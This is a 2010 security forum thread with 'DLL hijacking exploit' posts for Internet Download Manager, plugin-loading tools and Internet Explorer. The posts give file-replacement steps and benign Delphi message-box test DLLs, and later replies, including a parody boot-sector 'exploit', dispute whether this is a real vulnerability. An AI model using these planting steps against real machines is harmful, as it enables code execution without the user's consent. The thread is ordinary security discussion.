[STRELiTZIA]

Hi,

IDM Dll Hijacking Exploit:

Exploit Title: [Dll Hijacking Exploit]
Application: [Internet Download Manager module(idmmkb.dll) Tonec Inc.]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [All Internet Download Manager release]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Internet Download Manager module(idmmkb.dll) is a monitor for special keys (Alt, Ctrl, etc.) and for mouse clicks on web links in Internet Browsers.
That allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.

Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"

Perform this tests:
-------------------
- Restart your system.
- Try to run Windows Internet Explorer or Mozilla Firefox.
- Try to open you folders and links locate on your Desktop (My Computer, Recycle bin, My Documents and other...)
- Choose any Link property and click Find target.

Test Dll Delphi Source:
---//--
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---

Plugin Dll Hijacking Exploit:

Exploit Title: [Dll Hijacking Exploit]
Application: [Application plugin support]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [%Applications list%]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.


Applications list: (Tested)
-----------------
PEiD
FastScanner
ExeInfoPE
Stud_PE
PE Explorer
OllyDbg
IDA Pro (*.plw)
notepad++
Hex Workshop
Foxit Reader
PhotoFiltre Studio X
VLC Media player
Import REConstructor
PE Tools by NEOx
DiE- DETECT iT EASY

Instructions:
-------------
1- Copy "Test.dll" into "Application\%plugin%"

Perform this tests:
-------------------
- Launch Application.

Test Dll Delphi Source:
---//---
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---

Regards.

[Disillusion]

Here's a fairly complete write-up on the topic - http://blog.mandiant.com/archives/1207

[ssj100]

Thanks for this. I'll see if it works for me.

EDIT: cool, confirmed working in Windows XP, SP3, with Foxit Reader version 3.2.

[GamingMasteR]

Hi STR,

IDM is widespread and the exploit can be widely used.
But regarding the plugins system hijacking, does the attacker have to search disk for those applications as they are often used in portable forms (not installed in program files like PEiD/OllyDbg/Ida/..) ?!

I think there's no way for application developpers to check if loaded plugins are safe or not, it's the user responsibility :)

Best Regards.

[EP_X0FF]

Well, code signing can help.

[STRELiTZIA]

Hi,

Another one, I think I'll go a round all installed applications in my system :mrgreen:

Internet Explorer Dll Hijacking Exploit

====================================================
= INTERNET EXPLORER DLL HIJACKING EXPLOIT =
====================================================

Exploit Title : [Internet Explorer Dll Hijacking Exploit]
Date : [08 Sept 2010]
Author : [STRELiTZIA]
Software : [INTERNET EXPLORER]
Tested on : [Windows Xp SP3 + Office 2007]

============================
= Description =
============================
Internet Explorer laod %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.


============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".

============================
= Tests =
============================
- Launch Internet Explorer.


============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission.'),
PChar('Sample'),
MB_ICONSTOP
);
end.

[Brookit]

This goes a step further:

http://blog.acrossecurity.com/2010/09/b ... s-exe.html

[Cr4sh]

Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"

============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".

WTF is all this shit? How exactly it related to the real attack vectors?

PS:

;
; !!!0DAY!!! !!!0DAY!!! !!!0DAY!!!
; NTLDR Hijacking Exploit
;
; 1. Compile the following asm code
; 2. Save as C:\ntldr
; 3. Reboot your box
;

mov si, message
.loop:
lodsb
test al, al
jz .end
mov ah, 0x0e
int 0x10
jmp short .loop
.end:
jmp .end
message db "You are hecked!",0

[Alex]

WTF is all this shit? How exactly it related to the real attack vectors?

Yes, if you have admin privileges you can overwrite all DLL's and this can't be classified as vulnerability. Best example of this kind vulnerability is case when software loads DLL's from current directory while opening for example *.jpg file, instead of loading it from System32/ProgramFiles directories. It's almost like in case of LNK vulnerability and memory sticks, but user have to open an file to trigger DLL loading.

[EP_X0FF]

If you do some profiling with FileMon/DW for example you can watch that many applications are trying to load inexistent dll's (for example Dr.Web in past).